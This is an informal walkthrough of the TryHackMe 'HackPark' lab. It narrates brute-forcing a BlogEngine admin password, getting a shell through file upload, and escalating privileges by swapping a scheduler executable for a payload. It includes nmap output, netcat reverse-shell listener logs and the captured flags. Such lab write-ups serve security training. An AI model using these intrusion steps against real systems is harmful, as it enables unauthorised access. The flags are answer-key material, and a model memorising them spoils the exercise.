PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: hackpark | hackpark amusements
| http-methods:
|_ Supported Methods: HEAD
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HACKPARK
| NetBIOS_Domain_Name: HACKPARK
| NetBIOS_Computer_Name: HACKPARK
| DNS_Domain_Name: hackpark
| DNS_Computer_Name: hackpark
| Product_Version: 6.3.9600
|_ System_Time: 2025-11-11T13:44:46+00:00
|_ssl-date: 2025-11-11T13:45:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=hackpark
| Issuer: commonName=hackpark
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2025-11-10T13:10:11
| Not valid after: 2026-05-12T13:10:11
| MD5: 293e:cb01:040b:786f:d5c6:e7cc:6791:c039
| SHA-1: b798:cf68:e0d3:997e:fd92:49c5:4c13:8541:2908:6325
GOT JOKER PHOTO reverse image search
RECONNAISSANCE
analysing the source code i got version of blog engine i.e 3.3.6.0
still analysing the source code ..........
got something suspicious there ........... return url = /admin/
LOGIN PORTAL
CAPTURED THE POST REQ AND GONE FOR BRUTEFORCING THE PASSWORD PARAM AS USERNAME WAS ADMIN (THROUGH HINT ON THM )
GOT 302 AND MINIMUM LENGTH AND PASS IS 1qaz2wsx
LOGGEDIN AND TRIED EVERY THING LIKE CREATING THE POSTS AND ALL THINGS , ELSE THE MAIN MOTIVE WAS TO GET A UPLOAD THING ASAP , AS MENTIONED IN THE EXPLOIT.DB
AND WE GOT A FUNCTIONALITY THAT ASKS FOR UPLOADING THE FILES TO THE POST(PUBLIC ONE BY THE ADMINISTRATOR ITSELF ..........
HERE I UPLOADED THE FILE (AS I AM WRITING THIS WRITEUPPP LATE AFTER JUST MY MACHINE COMPLETED ) I FORGOT TO TAKE THE SCREENSHOT .........
AS WE CAN SEE THE URL PRESENT THERE , SO THAT IF I GO AND CHANGE THE IP AND GOT A PERFECT SHELL
THERE WE GOT THE SHELL..........
PRIVESC
STARTED THE PYTHON WEB SERVER ON PORT 8000
USING CMD CERTUTIL I GOT THE FILE TRANSFEREF , WE CAN ALSO DO THIS POWERSHELL -C
RUNNED THE WINPEAS BY .\rev.exe i saved that file as rev.exe
got two credentials ........here , ans if i login into this to rdp , you got both user and root immidiatly ........but we are doing with second method(conceptual prvided by thm )
known that there is running a SystemSheduler got to konw by winpeas and the directory of the path and i immidiately navigated to the path and got some Message.exe and more file running
made instant a payload for Message.exe and started the python server to transfer the file .........
using the certutil i was able to do transfer successfully............ on port 7777
as i copied the file it gave me the shell , if the shell is not caputred by netcat try to paste the certutil command again and u will get the shell or stop the particular process and start again , sc stop process name ,,, and st start process name
got root.txt
below is the final shell i established !!!!
after this i gone for user.txt .........
we can also get this by simply credentials we got by winpeas ..........
┌──(root㉿kali)-[/home/kali/tryhackme/hackpark]
└─# nc -lvnp 4445
listening on [any] 4445 ...
connect to [10.9.2.162] from (UNKNOWN) [10.201.56.216] 49258
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>
ls
c:\windows\system32\inetsrv>ls
dir
c:\windows\system32\inetsrv>dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of c:\windows\system32\inetsrv
08/03/2019 10:41 AM <DIR> .
08/03/2019 10:41 AM <DIR> ..
08/03/2019 09:45 AM 111,616 appcmd.exe
07/01/2013 08:49 AM 3,810 appcmd.xml
08/03/2019 09:45 AM 174,592 AppHostNavigators.dll
08/03/2019 09:45 AM 66,048 apphostsvc.dll
08/03/2019 09:45 AM 375,296 appobj.dll
08/03/2019 09:45 AM 130,560 aspnetca.exe
08/03/2019 09:45 AM 39,424 authanon.dll
08/03/2019 09:45 AM 24,576 cachfile.dll
08/03/2019 09:45 AM 49,664 cachhttp.dll
08/03/2019 09:45 AM 13,824 cachtokn.dll
08/03/2019 09:45 AM 13,824 cachuri.dll
08/03/2019 09:45 AM 70,656 certobj.dll
08/03/2019 09:45 AM 50,688 compstat.dll
08/03/2019 09:45 AM <DIR> config
08/03/2019 09:45 AM 42,496 custerr.dll
08/03/2019 09:45 AM 18,432 defdoc.dll
08/03/2019 09:45 AM 22,016 dirlist.dll
08/03/2019 09:45 AM <DIR> en
08/03/2019 09:45 AM <DIR> en-US
08/03/2019 10:14 AM 66,048 filter.dll
08/03/2019 09:45 AM 38,400 gzip.dll
08/03/2019 09:45 AM 19,968 httpmib.dll
08/03/2019 09:45 AM 17,408 hwebcore.dll
08/03/2019 09:45 AM 63,105 iis.msc
08/03/2019 09:45 AM 307,712 iiscore.dll
08/03/2019 09:45 AM 109,056 iisreg.dll
08/03/2019 09:45 AM 229,376 iisres.dll
08/03/2019 09:45 AM 35,328 iisrstas.exe
08/03/2019 09:45 AM 175,616 iissetup.exe
08/03/2019 09:45 AM 61,952 iissyspr.dll
08/03/2019 09:45 AM 14,848 iisual.exe
08/03/2019 09:45 AM 285,184 iisutil.dll
08/03/2019 09:45 AM 546,304 iisw3adm.dll
08/03/2019 10:41 AM 30,720 iis_ssi.dll
08/03/2019 09:45 AM 124,928 InetMgr.exe
08/03/2019 10:14 AM 115,200 isapi.dll
08/03/2019 09:45 AM 32,256 loghttp.dll
08/03/2019 09:45 AM 143,360 Microsoft.Web.Administration.dll
08/03/2019 09:45 AM 1,085,440 Microsoft.Web.Management.dll
08/03/2019 10:14 AM 41,984 modrqflt.dll
08/03/2019 09:45 AM 492,032 nativerd.dll
08/03/2019 09:45 AM 19,456 protsup.dll
08/03/2019 09:45 AM 31,232 rsca.dll
08/03/2019 09:45 AM 52,224 rscaext.dll
08/03/2019 09:45 AM 36,864 static.dll
08/03/2019 09:45 AM 185,344 uihelper.dll
08/03/2019 10:14 AM 18,432 validcfg.dll
08/03/2019 09:45 AM 14,848 w3ctrlps.dll
08/03/2019 09:45 AM 28,160 w3ctrs.dll
08/03/2019 09:45 AM 107,520 w3dt.dll
08/03/2019 09:45 AM 76,800 w3logsvc.dll
08/03/2019 09:45 AM 27,648 w3tp.dll
08/03/2019 09:45 AM 22,528 w3wp.exe
08/03/2019 09:45 AM 70,656 w3wphost.dll
08/03/2019 10:41 AM 29,696 warmup.dll
08/03/2019 09:45 AM 29,184 wbhstipm.dll
08/03/2019 09:45 AM 25,600 wbhst_pm.dll
08/03/2019 09:45 AM 162,816 XPath.dll
55 File(s) 6,182,755 bytes
5 Dir(s) 39,123,120,128 bytes free
whoami
c:\windows\system32\inetsrv>whoami
iis apppool\blog
shell
c:\windows\system32\inetsrv>shell
whoami
c:\windows\system32\inetsrv>whoami
iis apppool\blog
cd C:\\
c:\windows\system32\inetsrv>cd C:\\
dir
C:\>dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of C:\
11/11/2025 08:11 AM <DIR> badr
08/04/2019 03:34 AM <DIR> inetpub
08/22/2013 07:52 AM <DIR> PerfLogs
08/06/2019 01:08 PM <DIR> Program Files
08/06/2019 01:12 PM <DIR> Program Files (x86)
08/04/2019 10:54 AM <DIR> Users
10/02/2020 02:03 PM <DIR> Windows
0 File(s) 0 bytes
7 Dir(s) 39,123,116,032 bytes free
cd Users
C:\>cd Users
dir
C:\Users>dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of C:\Users
08/04/2019 10:54 AM <DIR> .
08/04/2019 10:54 AM <DIR> ..
08/03/2019 10:15 AM <DIR> .NET v4.5
08/03/2019 10:15 AM <DIR> .NET v4.5 Classic
08/05/2019 01:03 PM <DIR> Administrator
08/04/2019 10:54 AM <DIR> jeff
08/22/2013 07:39 AM <DIR> Public
0 File(s) 0 bytes
7 Dir(s) 39,123,116,032 bytes free
cd jeff
C:\Users>cd jeff
dir
C:\Users>dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of C:\Users
08/04/2019 10:54 AM <DIR> .
08/04/2019 10:54 AM <DIR> ..
08/03/2019 10:15 AM <DIR> .NET v4.5
08/03/2019 10:15 AM <DIR> .NET v4.5 Classic
08/05/2019 01:03 PM <DIR> Administrator
08/04/2019 10:54 AM <DIR> jeff
08/22/2013 07:39 AM <DIR> Public
0 File(s) 0 bytes
7 Dir(s) 39,123,116,032 bytes free
┌──(root㉿kali)-[/home/kali]
└─# nc -nvlp 7777
listening on [any] 7777 ...
connect to [192.168.131.25] from (UNKNOWN) [10.48.184.123] 49240
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\PROGRA~2\SYSTEM~1>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of C:\PROGRA~2\SYSTEM~1
08/04/2019 03:37 AM <DIR> .
08/04/2019 03:37 AM <DIR> ..
05/17/2007 12:47 PM 1,150 alarmclock.ico
08/31/2003 11:06 AM 766 clock.ico
08/31/2003 11:06 AM 80,856 ding.wav
11/11/2025 10:36 AM <DIR> Events
08/04/2019 03:36 AM 60 Forum.url
01/08/2009 07:21 PM 1,637,972 libeay32.dll
11/15/2004 11:16 PM 9,813 License.txt
11/11/2025 10:08 AM 1,496 LogFile.txt
11/11/2025 10:09 AM 3,760 LogfileAdvanced.txt
11/11/2025 10:36 AM 7,680 Message.exe
03/25/2018 09:59 AM 445,344 PlaySound.exe
03/25/2018 09:58 AM 27,040 PlayWAV.exe
08/04/2019 02:05 PM 149 Preferences.ini
03/25/2018 09:58 AM 485,792 Privilege.exe
03/24/2018 11:09 AM 10,100 ReadMe.txt
03/25/2018 09:58 AM 112,544 RunNow.exe
03/25/2018 09:59 AM 40,352 sc32.exe
08/31/2003 11:06 AM 766 schedule.ico
03/25/2018 09:58 AM 1,633,696 Scheduler.exe
03/25/2018 09:59 AM 491,936 SendKeysHelper.exe
03/25/2018 09:58 AM 437,664 ShowXY.exe
03/25/2018 09:58 AM 439,712 ShutdownGUI.exe
03/25/2018 09:58 AM 235,936 SSAdmin.exe
03/25/2018 09:58 AM 731,552 SSCmd.exe
01/08/2009 07:12 PM 355,446 ssleay32.dll
03/25/2018 09:58 AM 456,608 SSMail.exe
08/04/2019 03:36 AM 6,999 unins000.dat
08/04/2019 03:36 AM 722,597 unins000.exe
08/04/2019 03:36 AM 54 Website.url
06/26/2009 04:27 PM 6,574 whiteclock.ico
03/25/2018 09:58 AM 76,704 WhoAmI.exe
05/16/2006 03:49 PM 785,042 WSCHEDULER.CHM
05/16/2006 02:58 PM 2,026 WScheduler.cnt
03/25/2018 09:58 AM 331,168 WScheduler.exe
05/16/2006 03:58 PM 703,081 WSCHEDULER.HLP
03/25/2018 09:58 AM 136,096 WSCtrl.exe
03/25/2018 09:58 AM 98,720 WService.exe
03/25/2018 09:58 AM 68,512 WSLogon.exe
03/25/2018 09:59 AM 33,184 WSProc.dll
38 File(s) 10,618,947 bytes
3 Dir(s) 39,124,553,728 bytes free
C:\PROGRA~2\SYSTEM~1>cd C:\\
cd C:\\
C:\>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of C:\
11/11/2025 10:09 AM <DIR> badr
08/04/2019 03:34 AM <DIR> inetpub
08/22/2013 07:52 AM <DIR> PerfLogs
08/06/2019 01:08 PM <DIR> Program Files
08/06/2019 01:12 PM <DIR> Program Files (x86)
08/04/2019 10:54 AM <DIR> Users
10/02/2020 02:03 PM <DIR> Windows
0 File(s) 0 bytes
7 Dir(s) 39,124,553,728 bytes free
C:\>cd Users
cd Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of C:\Users
08/04/2019 10:54 AM <DIR> .
08/04/2019 10:54 AM <DIR> ..
08/03/2019 10:15 AM <DIR> .NET v4.5
08/03/2019 10:15 AM <DIR> .NET v4.5 Classic
08/05/2019 01:03 PM <DIR> Administrator
08/04/2019 10:54 AM <DIR> jeff
08/22/2013 07:39 AM <DIR> Public
0 File(s) 0 bytes
7 Dir(s) 39,124,553,728 bytes free
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of C:\Users\Administrator
08/05/2019 01:03 PM <DIR> .
08/05/2019 01:03 PM <DIR> ..
08/03/2019 09:43 AM <DIR> Contacts
08/04/2019 10:49 AM <DIR> Desktop
08/03/2019 09:43 AM <DIR> Documents
10/02/2020 01:38 PM <DIR> Downloads
08/03/2019 09:43 AM <DIR> Favorites
08/03/2019 09:43 AM <DIR> Links
08/03/2019 09:43 AM <DIR> Music
08/03/2019 09:43 AM <DIR> Pictures
08/03/2019 09:43 AM <DIR> Saved Games
08/03/2019 09:43 AM <DIR> Searches
08/03/2019 09:43 AM <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 39,124,553,728 bytes free
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of C:\Users\Administrator\Desktop
08/04/2019 10:49 AM <DIR> .
08/04/2019 10:49 AM <DIR> ..
08/04/2019 10:51 AM 32 root.txt
08/04/2019 03:36 AM 1,029 System Scheduler.lnk
2 File(s) 1,061 bytes
2 Dir(s) 39,124,553,728 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
7e13d97f05f7ceb9881a3eb3d78d3e72
C:\Users\Administrator\Desktop>
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of C:\Users\Administrator\Desktop
08/04/2019 10:49 AM <DIR> .
08/04/2019 10:49 AM <DIR> ..
08/04/2019 10:51 AM 32 root.txt
08/04/2019 03:36 AM 1,029 System Scheduler.lnk
2 File(s) 1,061 bytes
2 Dir(s) 39,124,553,728 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
7e13d97f05f7ceb9881a3eb3d78d3e72
C:\Users\Administrator\Desktop>^C
┌──(root㉿kali)-[/home/kali]
└─# nc -nvlp 7777
listening on [any] 7777 ...
connect to [192.168.131.25] from (UNKNOWN) [10.48.184.123] 49254
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\PROGRA~2\SYSTEM~1>cd C:\\Users\jeff
cd C:\\Users\jeff
C:\Users\jeff>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of C:\Users\jeff
08/04/2019 10:54 AM <DIR> .
08/04/2019 10:54 AM <DIR> ..
08/04/2019 10:54 AM <DIR> Contacts
08/04/2019 10:55 AM <DIR> Desktop
08/04/2019 10:54 AM <DIR> Documents
08/04/2019 10:54 AM <DIR> Downloads
08/04/2019 10:54 AM <DIR> Favorites
08/04/2019 10:54 AM <DIR> Links
08/04/2019 10:54 AM <DIR> Music
08/04/2019 10:54 AM <DIR> Pictures
08/04/2019 10:54 AM <DIR> Saved Games
08/04/2019 10:54 AM <DIR> Searches
08/04/2019 10:54 AM <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 39,124,549,632 bytes free
C:\Users\jeff>cd Desktop
cd Desktop
C:\Users\jeff\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of C:\Users\jeff\Desktop
08/04/2019 10:55 AM <DIR> .
08/04/2019 10:55 AM <DIR> ..
08/04/2019 10:57 AM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 39,124,549,632 bytes free
C:\Users\jeff\Desktop>cat user.txt
cat user.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\jeff\Desktop>type user.txt
type user.txt
759bd8af507517bcfaede78a21a73e39
C:\Users\jeff\Desktop>
